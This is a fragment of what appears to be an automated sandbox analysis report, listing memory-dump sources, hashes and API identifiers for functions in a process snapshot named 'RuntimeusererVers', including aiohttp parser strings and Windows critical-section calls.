                                                                                                                                                                                                                                          • Instruction ID: f15709cfb6079ca2222f0abd6eba8877751f75e94a447a5685ab83a124f8a4d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 657bd97a248e0907a2f55b6056d01d21e16768e8bf09d977d51afe3b81ec960e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21317222E08F8982EA158F65B54023963A1FF99BD4F149330DA8F17B19EF3CE580C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Object_Track
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 887704541-0
                                                                                                                                                                                                                                          • Opcode ID: ea7f5c7749f210560d737f31f5d2c768362e1b760572754654251131aa97cac9
                                                                                                                                                                                                                                          • Instruction ID: 32a2d26030163781b0a6ff05da2626c4f611e83555ad980176bafddfbc6eeab8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea7f5c7749f210560d737f31f5d2c768362e1b760572754654251131aa97cac9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6112E76A29E4182EB698F65EC5403973B4FFC8BE4B488334DA5E86654DF3CE5A0C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Size
                                                                                                                                                                                                                                          • String ID: __init__$aiohttp._http_parser.RawRequestMessage.__init__
                                                                                                                                                                                                                                          • API String ID: 1288431816-4042305137
                                                                                                                                                                                                                                          • Opcode ID: c1fac7badf9f570d4a83c073247942143985e0ac2c582bda5ca5c3dcb7ed2314
                                                                                                                                                                                                                                          • Instruction ID: dfaa6b13e9f42d3e0e02520c76d9edcd7978a2b4b5d53e426502f29bbd6d49c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1fac7badf9f570d4a83c073247942143985e0ac2c582bda5ca5c3dcb7ed2314
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0410576B1AF49CAEB50CB55E8402AD33B4F748BE8B000626DE8D57B58DF38E1A1C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: abort
                                                                                                                                                                                                                                          • String ID: Invalid method encountered$PTIONS
                                                                                                                                                                                                                                          • API String ID: 4206212132-3544517189
                                                                                                                                                                                                                                          • Opcode ID: ff1df5bc78856c918e199140c5a0a4e34fc5a74851ee11982e10d358e08ffeed
                                                                                                                                                                                                                                          • Instruction ID: c269ebb62cbcd77e293445bdec9075f376a4489891d8dd31445c365f207bce71
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1df5bc78856c918e199140c5a0a4e34fc5a74851ee11982e10d358e08ffeed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9219F2192DE828AEB708B14EC54279B6A5FB147E4F080235C68E42795EE7CF740C301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF81DF3105A), ref: 00007FF81DF2E856
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF81DF3105A), ref: 00007FF81DF2E878
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00007FF81DF3105A), ref: 00007FF81DF2E889
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                          • Opcode ID: 477a939bf6ca1eaf0d507249706af977f8bafa9d202fc40f452e06a3323fc59f
                                                                                                                                                                                                                                          • Instruction ID: 2d0e158e7aab15466f4a1c4749819e4a8845bc692e19c6a387b47a7ce56c096f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 477a939bf6ca1eaf0d507249706af977f8bafa9d202fc40f452e06a3323fc59f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A113662A09A4582EB858F69F5413796360FF88BE8F089230DA9F06319EE28D6D1C700